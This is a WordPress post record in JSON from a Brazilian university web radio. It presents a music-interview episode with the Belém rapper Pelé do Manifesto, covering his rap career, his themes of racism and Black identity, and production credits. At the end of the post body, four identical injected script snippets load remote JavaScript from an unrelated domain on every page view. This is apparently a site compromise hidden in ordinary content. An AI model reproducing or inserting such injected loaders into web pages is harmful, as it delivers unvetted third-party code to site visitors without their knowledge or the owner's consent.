{"id":8967,"date":"2021-10-08T11:07:17","date_gmt":"2021-10-08T14:07:17","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=8967"},"modified":"2025-10-21T13:25:20","modified_gmt":"2025-10-21T16:25:20","slug":"pele-do-manifesto","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/","title":{"rendered":"Pel\u00e9 do Manifesto"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/BATE-PAPO-MUSICAL-PELE-DO-MANIFESTO-08.10.21.mp3'>Bate-Papo Musical - Pel\u00e9 do Manifesto<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/BATE-PAPO-MUSICAL-PELE-DO-MANIFESTO-08.10.21.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"Bate-Papo Musical - Pel\\u00e9 do Manifesto\",\"caption\":\"\",\"description\":\"\\\"BATE-PAPO MUSICAL - PEL\\u00c9 DO MANIFESTO - 08.10.21\\\". G\\u00eanero: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"Bate-Papo Musical\",\"genre\":\"Other\",\"length_formatted\":\"50:52\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n\n\n<p>Nesta edi\u00e7\u00e3o do Bate Papo Musical conversamos com o cantor, compositor e poeta <strong>Pel\u00e9 do Manifesto<\/strong>.<\/p>\n\n\n\n<p>Cantando e rimando sobre a periferia de Bel\u00e9m, Alan Rosevelt, mais conhecido como <strong>Pel\u00e9 do Manifesto<\/strong>, usa sua arte como instrumento de den\u00fancia da viol\u00eancia e da discrimina\u00e7\u00e3o racial e social presentes nestas localidades. Atrav\u00e9s do rap, Pel\u00e9 tamb\u00e9m aborda quest\u00f5es da identidade negra, do cotidiano da metr\u00f3pole, da cultura e da vida da juventude.<\/p>\n\n\n\n<p>Com as rimas, o falar claro e direto e a forma de express\u00e3o \u00fanica do rap, o artista se encontrou dentro do cen\u00e1rio musical. Influenciado por m\u00fasicos como Gabriel \u201cO Pensador\u201d, Racionais MC, Marcelo D2 e Emicida, <strong>Pel\u00e9 do Manifesto<\/strong> tem 13 anos de carreira e \u00e9, atualmente, um dos principais nomes do rap paraense.<\/p>\n\n\n\n<p>\u201cCom o Rap, eu acabei vendo uma cr\u00f4nica da vida de algum artista que se assemelhava \u00e0 minha. Eu comecei a ver que \u2018os caras\u2019 falavam uma linguagem que era parecida com a minha, que eles falavam de viv\u00eancias que eram quase as mesmas viv\u00eancias que eu tinha. Ent\u00e3o, aquilo me encantou, aquilo acabou me cativando. Poxa, s\u00e3o homens negros, s\u00e3o mulheres negras falando sobre coisas que tamb\u00e9m t\u00f4 passando, ent\u00e3o eu queria falar tamb\u00e9m sobre isso. E isso que me levou a tamb\u00e9m escrever, a compor e a cantar Rap\u201d, comenta Pel\u00e9.<\/p>\n\n\n\n<p>Um dos seus principais trabalhos \u00e9 o single \u201cSou Neguinho\u201d, que retrata perfeitamente a sua rela\u00e7\u00e3o com o rap como instrumento representativo da sua arte e viv\u00eancia dentro de periferias de Bel\u00e9m e como homem preto. A m\u00fasica aborda, ainda, quest\u00f5es como racismo e exalta\u00e7\u00e3o da cultura preta.<\/p>\n\n\n\n<p>A produ\u00e7\u00e3o do artista evidencia ainda influ\u00eancias do tecnobrega e da black music, como demonstrado no disco \u201cGueto Flow, Preto Show\u201d. Conhe\u00e7a mais sobre esse e outros trabalhos, al\u00e9m da trajet\u00f3ria de <strong><a href=\"https:\/\/www.youtube.com\/watch?v=kmku02tF3Kg&amp;list=PLZ1Q1CdhPFNvFDpJN1ocCC7mteDJRvcMm&amp;index=2\">Pel\u00e9 do Manifesto<\/a><\/strong>, conferindo a \u00edntegra deste programa. N\u00e3o perca!<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Sou Neguinho - Pel\u00e9 do Manifesto\" width=\"1200\" height=\"675\" src=\"https:\/\/www.youtube.com\/embed\/kmku02tF3Kg?list=PLZ1Q1CdhPFNvFDpJN1ocCC7mteDJRvcMm\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Apresenta\u00e7\u00e3o: Fabr\u00edcio Queiroz<br>Produ\u00e7\u00e3o e roteiro: Isabelly Risuenho<br>Grava\u00e7\u00e3o e montagem: Jo\u00e3o Nilo<br>Supervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista e Fabr\u00edcio Queiroz<\/p>\n\n\n\n<p>O Bate-Papo Musical com<strong> Pel\u00e9 do Manifesto<\/strong> vai ao ar no s\u00e1bado, \u00e0s 10h. Hor\u00e1rios Alternativos: Domingo, \u00e0s 15h e Ter\u00e7a-feira, \u00e0s 19h.<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Pel\u00e9 do Manifesto\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\" aria-label=\"Read more about Pel\u00e9 do Manifesto\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":8968,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[5],"tags":[],"class_list":["post-8967","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bate-papo-musical"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pel\u00e9 do Manifesto - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O trabalho do rapper Pel\u00e9 do Manifesto, exalta aidentidade negra, o cotidiano de Bel\u00e9m, a cultura e a vida da juventude de periferia.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pel\u00e9 do Manifesto - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O trabalho do rapper Pel\u00e9 do Manifesto, exalta aidentidade negra, o cotidiano de Bel\u00e9m, a cultura e a vida da juventude de periferia.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2021-10-08T14:07:17+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:25:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1565\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Pel\u00e9 do Manifesto\",\"datePublished\":\"2021-10-08T14:07:17+00:00\",\"dateModified\":\"2025-10-21T16:25:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\"},\"wordCount\":414,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1\",\"articleSection\":[\"Bate-papo Musical\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\",\"name\":\"Pel\u00e9 do Manifesto - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1\",\"datePublished\":\"2021-10-08T14:07:17+00:00\",\"dateModified\":\"2025-10-21T16:25:20+00:00\",\"description\":\"O trabalho do rapper Pel\u00e9 do Manifesto, exalta aidentidade negra, o cotidiano de Bel\u00e9m, a cultura e a vida da juventude de periferia.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1\",\"width\":2560,\"height\":1565},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pel\u00e9 do Manifesto\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pel\u00e9 do Manifesto - Radio Web UFPA","description":"O trabalho do rapper Pel\u00e9 do Manifesto, exalta aidentidade negra, o cotidiano de Bel\u00e9m, a cultura e a vida da juventude de periferia.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/","og_locale":"pt_BR","og_type":"article","og_title":"Pel\u00e9 do Manifesto - Radio Web UFPA","og_description":"O trabalho do rapper Pel\u00e9 do Manifesto, exalta aidentidade negra, o cotidiano de Bel\u00e9m, a cultura e a vida da juventude de periferia.","og_url":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2021-10-08T14:07:17+00:00","article_modified_time":"2025-10-21T16:25:20+00:00","og_image":[{"width":2560,"height":1565,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Pel\u00e9 do Manifesto","datePublished":"2021-10-08T14:07:17+00:00","dateModified":"2025-10-21T16:25:20+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/"},"wordCount":414,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1","articleSection":["Bate-papo Musical"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/","url":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/","name":"Pel\u00e9 do Manifesto - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1","datePublished":"2021-10-08T14:07:17+00:00","dateModified":"2025-10-21T16:25:20+00:00","description":"O trabalho do rapper Pel\u00e9 do Manifesto, exalta aidentidade negra, o cotidiano de Bel\u00e9m, a cultura e a vida da juventude de periferia.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1","width":2560,"height":1565},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/bate-papo-musical\/pele-do-manifesto\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Pel\u00e9 do Manifesto"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/10\/Pele-do-Manifesto-Capa-site-scaled.jpg?fit=2560%2C1565&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2kD","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8967","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=8967"}],"version-history":[{"count":9,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8967\/revisions"}],"predecessor-version":[{"id":17922,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8967\/revisions\/17922"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/8968"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=8967"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=8967"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=8967"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}